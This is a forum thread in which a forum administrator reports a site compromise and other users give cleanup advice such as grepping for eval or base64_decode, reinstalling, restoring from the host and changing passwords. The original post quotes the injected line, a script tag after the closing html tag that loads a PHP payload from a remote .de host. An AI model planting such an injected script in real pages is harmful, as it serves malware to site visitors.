PC compromised
When i visited today my forum, there popups an security popup from my Avast! security system on my pc saying my forum has an trojan detected on it.
And the page speed i mindblowing slow, first time i loaded it it needs to get 5 minutes waiting on some request from a .de website...
So i checked out my source code, and i found some code after my </html> tag...
</body></html><script type="text/javascript" src="http:// babsy. cwsurf.de/sicherung/Utherverse/hwhbfxcl.php?id=2332630"></script>
I didn't place that there, also cant find it in my default.master.tpl or elsewhere...
Whatttttt is this? The last thing i did was update from 2.1.3 to 2.1.5....
website is tattootalk.nl (so, lets carefull my computer says it has an trojan, but does not block the entire website...)
Anyone?
Answers
are you using any insecure plugins that you have been told not to use? or using cleditor in an insecure way.
perhaps your computer is infected and you infected your forum
ask your host if they can see how you were infected. they provide support relating to this.
the "free advice" I can give.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
Yes, im using that poll plugin?
Some strange thing happen!!! My Shoutbox doesn't work anymore.......... didn't change things at least for a week and everything worked smoothly yesterday.
ask your host to restore, and only use secure versions of vanilla software, clean your local pc. and don't use insecure plugins.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
Shitttt! But who says it comes from either the shoutbox or poll plugin?
I dont get it away, disabled them both but the code is there after the
</html>tagMy host to restore? can they do that?![:\](https://open.vanillaforums.com/plugins/emojiextender/emoji/little/confused.png ":\")
It could be that asperegrine says your computer or some other computer that has access to your server is infect then upload the payload, piggybacking your session. This is particularly a possibility if you keep getting reinfected.
Post an an example of the code does it have
base64_decode,eval, etc?Or in general your server security is comprised then you can .
There were of couple of very serious security vulnerabilities in linux systems, that could be use to do pretty much anything if they didn't update the OS.
I doubt it is from XSS in the forum software itself, I know a fair bit about this.
grep is your friend.
You will almost certainly going to need to replace all those files, but if you don't find the source you may be infected again.
If your file permission are set correctly then the infection is more likely to be using you, or someone with your level of privileges to infect the files.
grep is your friend.
I cant get the code here so im doing an image
This script tag after the html get included on every page... but i dont know if thats the trojan, cause my trojan says someting like 3842349library{gzip} but that message of the trojan i dont get anymore only the first time i loaded the site...
Im using windows xp, sp3... thats important? my computer scan says there are no infections are whatever on my pc.
yes your file are likely infected.
try lookign in the files such as
index.phpcompare with a clean copy.grep is your friend.
if you find it can you please not screen shot it. Instead put the code like so
Screen shots of text drive me up the wall.
grep is your friend.
I don't know why you are changing the discussion title.
if your goal is to bring your forum back,
you need to re-install version 2.1.5. if you are not re-infecting your host from your local pc.
if you don't have a trojan or virus, reinstalling 2.1.5 won't hurt.
as well as talk to your host about server OS vulnerabilties as x00 suggested.
if your goal is to find out what may have happened - zip up your forum folder and explore it later, being careful, not to re-infect.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
@Linc can you change the title of this discussion to something more descriptive. Thanks
grep is your friend.
WOW I didnt change that!!!!!!
I dont change that title! What is going on, my pc is infected?
perhaps someone now has your login name and password for vanilla forums, if a moderator didn't change the title and you didn't.
I suggest after you bring your forum back on-line - change all passwords to database as well as admin passwords. And if someone has compromised your login and passwords for other sites, change them as well.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
well it is pasted in. That is hgtonight's email. See
https://github.com/hgtonight/Vanilla-Plugins/blob/master/BlanderBlog/class.blanderblog.plugin.php
grep is your friend.
I didn't changed it into PC compromised not !!!!!!!
I edited the title as requested by x00. Calm down.
In changed my pass here on the site.
but who edited it to hgtonight's email address is the big question.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.